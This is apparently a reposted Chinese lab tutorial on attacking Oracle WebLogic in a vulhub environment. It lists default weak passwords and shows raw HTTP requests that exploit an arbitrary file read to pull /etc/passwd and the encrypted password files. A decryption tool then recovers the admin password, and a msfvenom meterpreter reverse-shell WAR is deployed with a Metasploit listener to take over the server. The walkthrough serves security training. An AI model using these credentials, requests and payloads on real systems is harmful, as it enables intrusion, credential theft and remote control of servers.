Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞

这篇具有很好参考价值的文章主要介绍了Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Weblogic 弱口令、任意文件读取漏洞

环境安装

此次我们实验的靶场,是vnlhub中的Weblogic漏洞中的weak_password靶场,我们 cd 到weak_password,然后输入以下命令启动靶场环境:

docker-compose up -d

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

输入以下的命令可以查看当前启动的靶场环境:

docker-compose ps

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

漏洞复现

首先我们可以通过本机的IP加端口号( http://192.168.41.132:7001/console/login/LoginForm.jsp)来进行靶场访问,如图这就是漏洞靶场的界面了

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

弱口令漏洞

这里我们可以使用弱口令来尝试登陆界面,Weblogic常用的弱口令密码有如下几种:

system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem: wlcsystem
weblogic:Oracle@123

这里我们使用 weblogic:Oracle@123 的密码成功爆破弱口令进入后台

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

如下图是Weblogic的后台管理界面

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

任意文件读取漏洞

我们访问这个IP地址,http://192.168.41.132:7001/hello/file.jsp?path=/etc/passwd,这个地址存在任意文件读取漏洞,我们输入这点URL后,浏览器会下载一个file.htm文件

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

file.htm文件的内容如图所示

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

上述步骤说明http://192.168.41.132:7001/hello/file.jsp?path=这个URL路径存在任意文件读取漏洞,现在我们知道了这个路径存在任意文件读取漏洞,那我们该如何利用这个漏洞呢?Weblogic的服务器存在两个文件,密文和密钥,Weblogic的服务器存储密文的绝对路径是:/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat,相对路径是:security/SerializedSystemIni.dat,密钥文件的绝对路径是:/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml,相对路径是:config/config.xml

现在我们打开BP,点击进入 Repeater 重放模块,重放以下的数据包获取密文(注意这里的主机IP和端口号要改成你靶机的IP和端口号)

GET
/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/security/Serialize
dSystemIni.dat HTTP/1.1
Host: X.X.X.X:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/97.0.4692.71 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8, application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=XxnDkhsRVyXhvQZDkZfMz1jKwPxtMnVyvTDZTPyFP1QD2Gnq2R2F!- 1485790404
Connection: close

点击 send,发送数据包,得到以下数据

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

然后点击 Hex,切换为 16 进制的数据格式

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

选中以下的数据分段

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

右键点击copy to file,进行复制,保存为 111.dat 文件

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

然后我们重新发送以下的数据包,获取密钥文件(注意这里的主机IP和端口号要改成你靶机的IP和端口号)

GET
/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml
HTTP/1.1
Host: X.X.X.X:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/97.0.4692.71 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8, application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=XxnDkhsRVyXhvQZDkZfMz1jKwPxtMnVyvTDZTPyFP1QD2Gnq2R2F!- 1485790404
Connection: close

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

现在我们得到了密钥的文件,然后将其保存复制下来,后面解密会用到

接下来我们去进行 Weblogic 密文的解密

Weblogic解密工具下载地址:https://github.com/TideSec/Decrypt_Weblogic_Password

此次我们使用的是这个工具:https://github.com/TideSec/Decrypt_Weblogic_Password/tree/master/Tools5-weblogic_decrypt

将工具下载到本地之后,我们通过以下代码启动工具

java -jar weblogic_decrypt.jar

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

然后将文件选择为我们保存的111.dat文件,密文这里填写我们获得得密钥,然后点击确定,成功解密出密码

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

然后我们使用 weblogic 用户名 和 破解出来得密码 Oracle@123 尝试登陆后台

控制目标服务器

我们获得用户名和密码之后尝试登陆Weblogic 的后台

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

现在我们已经通过弱口令或者任意文件读取漏洞获得密码成功登陆了Weblogic服务器的后台界面

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

进入到后台之后,我们该如何去利用呢?首先我们通过kali生成一个木马

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.41.132 lport=4444 -f war -o java.war

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

点击左侧 部署->安装->上载文件->选择部署,上传java.war包->(全部下一步)-> 完成

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络
Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

上传好后的界面如图所示:

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

然后kali机器开启监听

msfconsole	
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.41.132
set LPORT 4444
exploit

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

接下来我们访问 http://192.168.41.132:7001/java这个URL来触发木马回连

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络

kali机器收到监听

Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞,中间件漏洞,网络安全,安全,网络文章来源地址https://www.toymoban.com/news/detail-683262.html

到了这里,关于Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 中间件安全IIS----文件解析漏洞利用

          IIS服务器主要存在两种解析缺陷:文件夹解析漏洞和分号截断漏洞。下面就来分别具体 了解一下。        在IS5x和6.0下对于录名称为“xasp”中的任何内容,包括“1.jpg”这样的图片文件,都会被当作ASP文件解析。例如“/example.asp/1.jpg”,这本来是一个图片资源,但是

    2024年01月18日
    浏览(31)
  • 33、WEB攻防——通用漏洞&文件上传&中间件解析漏洞&编辑器安全

    IIS爆过漏洞的版本:IIS6.0(windows server 2003)、IIS7.0和IIS7.5(windows server 2008) IIS6.0解析漏洞: 文件名:x.asp;x.jpg,jpg的文件后缀名,但是会被解析为asp文件; 目录名:x.asp/x.jpg, 文件目录名含有.asp后缀,x.jpg也会被解析为asp文件。 触发条件: IIS6.0这个中间件; 上传文件能不

    2024年01月24日
    浏览(55)
  • Web漏洞-任意文件读取漏洞

    任意文件读取漏洞 原理 任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过校验或者校验不严格,用户可以控制这个变量或者

    2024年02月13日
    浏览(34)
  • day33 文件上传&中间件解析漏洞&编辑器安全

    先判断中间件,是否有解析漏洞,字典扫描拿到上传点,或者会员中心,有可能存在文件上传的地方,而后测试绕过/验证,根据实际情况判断是白名单、黑名单还是内容其他的绕过,绕过/验证和中间件的解析漏洞也不行的话就看看CMS是否存在漏洞,然后看看编辑器漏洞有无

    2024年02月05日
    浏览(28)
  • 小迪安全33WEB 攻防-通用漏洞&文件上传&中间件解析漏洞&编辑器安全

    # 知识点: 1 、中间件安全问题 2 、中间件文件上传解析 3 、 Web 应用编辑器上传 编辑器也就是第三方插件,一般都是文件上传漏洞 # 详细点: 1 、检测层面:前端,后端等 2 、检测内容:文件头,完整性,二次渲染等 3 、检测后缀:黑名单,白名单, MIME 检测等 4 、绕过技

    2024年03月16日
    浏览(45)
  • 渗透测试漏洞原理之---【任意文件读取漏洞】

    1、概述 一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。 任意文件读取会造成(敏感)信息泄露; 任意文件读取大多数情况是由

    2024年02月10日
    浏览(37)
  • 任意文件读取及漏洞复现

    一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。 任意文件读取会造成(敏感)信息泄露: 任意文件读取很多情况是由于其他漏

    2024年02月09日
    浏览(37)
  • 任意文件读取漏洞

    任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。 攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取

    2024年02月15日
    浏览(35)
  • 任意文件读取与下载漏洞

    任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取配置信息甚至系统重要文件。其中的目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安

    2023年04月09日
    浏览(32)
  • 任意文件读取和漏洞复现

    一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。 任意文件读取会造成(敏感)信息泄露: 任意文件读取大多数情况是由于其他

    2024年02月09日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包